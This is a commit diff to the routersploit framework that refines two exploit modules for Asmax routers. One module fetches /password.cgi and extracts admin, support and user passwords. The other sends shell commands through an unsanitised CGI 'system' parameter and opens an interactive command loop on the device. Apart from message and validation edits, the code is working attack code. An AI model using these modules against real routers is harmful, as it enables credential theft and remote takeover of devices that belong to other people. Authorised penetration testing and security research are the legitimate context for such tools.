Improving Asmax exploits (#265)

routersploit/modules/exploits/routers/asmax/ar_1004g_password_disclosure.py

@@ -2,6 +2,7 @@ from routersploit import (
     exploits,
     print_error,
     print_success,
+    print_status,
     print_table,
     http_request,
     mute,
@@ -13,11 +14,11 @@ from routersploit import (
 class Exploit(exploits.Exploit):
     """
     Exploit implementation for Asmax AR1004G Password Disclosure vulnerability.
-    If the target is vulnerable it allows to read credentials for admin, support and user."
+    If the target is vulnerable it is possible to read credentials for admin, support and user accounts.
     """
     __info__ = {
         'name': 'Asmax AR1004G Password Disclosure',
-        'description': 'Exploits asmax password disclosure vulnerability that allows to '
+        'description': 'Exploits Asmax AR1004G Password Disclosure vulnerability that allows to '
                        'fetch credentials for: Admin, Support and User accounts.',
         'authors': [
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
@@ -30,16 +31,17 @@ class Exploit(exploits.Exploit):
         ],
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
-    port = exploits.Option(80, 'Target port')  # default port
+    target = exploits.Option('', 'Target URL address e.g. http://192.168.1.1', validators=validators.url)  # target url address
+    port = exploits.Option(80, 'Target HTTP port', validators=validators.integer)  # target http port
 
     def run(self):
         creds = []
         url = "{}:{}/password.cgi".format(self.target, self.port)
 
-        try:
-            response = http_request(method="GET", url=url).text
-        except AttributeError:
+        print_status("Requesting {}".format(url))
+        response = http_request(method="GET", url=url)
+        if response is None:
+            print_error("Exploit failed - empty response")
             return
 
         tokens = [
@@ -48,14 +50,15 @@ class Exploit(exploits.Exploit):
             ("user", r"pwdUser = '(.+?)'")
         ]
 
-        for token in tokenize(tokens, response):
+        print_status("Trying to extract credentials")
+        for token in tokenize(tokens, response.text):
             creds.append((token.typ, token.value[-1]))
 
         if creds:
-            print_success("Credentials found!")
+            print_success("Credentials found")
             print_table(("Login", "Password"), *creds)
         else:
-            print_error("Credentials could not be found")
+            print_error("Exploit failed - credentials could not be found")
 
     @mute
     def check(self):

routersploit/modules/exploits/routers/asmax/ar_804_gu_rce.py

@@ -32,18 +32,21 @@ class Exploit(exploits.Exploit):
         ],
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
-    port = exploits.Option(80, 'Target Port')
+    target = exploits.Option('', 'Target URL address e.g. http://192.168.1.1', validators=validators.url)  # target url address
+    port = exploits.Option(80, 'Target HTTP port', validators=validators.integer)  # target http port
 
     def run(self):
+        print_status("Checking if target is vulnerable")
+
         if self.check():
             print_success("Target is vulnerable")
             print_status("Invoking command loop...")
             shell(self, architecture="mips")
         else:
-            print_error("Target is not vulnerable")
+            print_error("Exploit failed - target seems to be not vulnerable")
 
     def execute(self, cmd):
+        """ callback used by shell functionality """
         url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)
 
         response = http_request(method="GET", url=url)